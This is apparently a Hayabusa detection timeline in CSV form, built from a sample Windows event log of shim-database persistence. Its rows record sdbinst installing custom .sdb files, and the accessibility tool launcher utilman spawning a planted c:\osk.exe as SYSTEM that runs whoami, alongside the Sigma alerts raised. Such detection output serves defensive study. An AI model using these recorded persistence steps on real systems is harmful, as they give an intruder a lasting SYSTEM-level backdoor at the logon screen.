365ABB72-55E8-5C91-0000-0010A9E20700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:44.982 
+09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2108 | PGUID: 365ABB72-55E8-5C91-0000-0010AEE50700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:45.152 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 3956 | PGUID: 365ABB72-55E9-5C91-0000-00105BEA0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2104 | PGUID: 365ABB72-55E9-5C91-0000-00102EEB0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:45.172 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3956 | PGUID: 
365ABB72-55E9-5C91-0000-00105BEA0700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:47.245 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2568 | PGUID: 365ABB72-55EB-5C91-0000-001076F60700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:51:05.017 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 612 | PGUID: 365ABB72-5638-5C91-0000-0010651A0800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3896 | PGUID: 365ABB72-5689-5C91-0000-0010543F0800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:25.953 +09:00,PC01.example.corp,11,info,,File Created,Path: 
C:\Windows\AppPatch\Custom\{7146b11e-ec78-4046-b854-9c9bdc68691e}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 3896 | PGUID: 365ABB72-5689-5C91-0000-0010543F0800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:25.953 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:25.953 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:25.973 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:25.973 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:25.973 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:25.983 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:26.104 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3848 | PGUID: 365ABB72-5689-5C91-0000-0010A1420800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:26.104 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3848 | PGUID: 365ABB72-5689-5C91-0000-0010A1420800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:26.114 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 4012 | PGUID: 365ABB72-568A-5C91-0000-0010A6450800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:26.274 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 100 | PGUID: 365ABB72-568A-5C91-0000-0010484A0800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:26.364 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 100 | PGUID: 365ABB72-568A-5C91-0000-0010484A0800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 4072 | PGUID: 365ABB72-568A-5C91-0000-0010D24B0800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:29.138 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2476 | PGUID: 365ABB72-568D-5C91-0000-001061560800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2548 | PGUID: 365ABB72-569F-5C91-0000-001012610800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.144 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{9aadf096-343f-4575-9514-4e5551e5ff19}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 2548 | PGUID: 365ABB72-569F-5C91-0000-001012610800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.144 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.144 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.154 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.164 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.164 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.164 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.294 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3088 | PGUID: 365ABB72-569F-5C91-0000-00105C640800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.294 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3088 | PGUID: 365ABB72-569F-5C91-0000-00105C640800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.334 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3100 | PGUID: 365ABB72-569F-5C91-0000-00105F670800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 3132 | PGUID: 365ABB72-569F-5C91-0000-0010036C0800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3140 | PGUID: 365ABB72-569F-5C91-0000-0010D96C0800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.484 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3132 | PGUID: 365ABB72-569F-5C91-0000-0010036C0800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:50.268 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3312 | PGUID: 365ABB72-56A2-5C91-0000-0010D2770800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:56:05.149 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 3176 | PGUID: 365ABB72-5765-5C91-0000-001039030900,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Users\user01\Desktop\titi.sdb"" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2848 | PGUID: 365ABB72-57EC-5C91-0000-001097810900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:21.014 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 2848 | PGUID: 365ABB72-57EC-5C91-0000-001097810900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:21.014 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:21.014 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:21.044 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:21.044 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:21.054 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:21.054 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:28.214 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 384 | PGUID: 365ABB72-57F4-5C91-0000-0010F0910900,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:28.294 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 2892 | PGUID: 365ABB72-57F4-5C91-0000-001083920900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:28.304 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 3700 | PGUID: 365ABB72-57F4-5C91-0000-001070930900,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:28.815 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 2604 | PGUID: 365ABB72-57F4-5C91-0000-0010BB9C0900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:31.860 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\system32\utilman.exe | PID: 3204 | PGUID: 365ABB72-57F7-5C91-0000-001008B30900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:31.860 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3204 | PGUID: 365ABB72-57F7-5C91-0000-001008B30900,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:35.745 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""c:\osk.exe"" | Process: C:\osk.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: utilman.exe /debug | LID: 0x3e7 | PID: 2128 | PGUID: 365ABB72-57FB-5C91-0000-00104FD40900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""c:\osk.exe"" | LID: 0x3e7 | PID: 2456 | PGUID: 365ABB72-5804-5C91-0000-001044DE0900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,Disc,Whoami Execution Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:00:01.518 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\wsqmcons.exe | Process: C:\Windows\System32\wsqmcons.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2772 | PGUID: 365ABB72-5851-5C91-0000-0010E1030A00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:00:01.539 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Process: C:\Windows\System32\schtasks.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\wsqmcons.exe | LID: 0x3e7 | PID: 2716 | PGUID: 365ABB72-5851-5C91-0000-00107D050A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:10:34.489 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 792 | PGUID: 365ABB72-5ACA-5C91-0000-0010DC1E0B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:18:54.257 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2884 | PGUID: 365ABB72-5CBE-5C91-0000-001017150C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
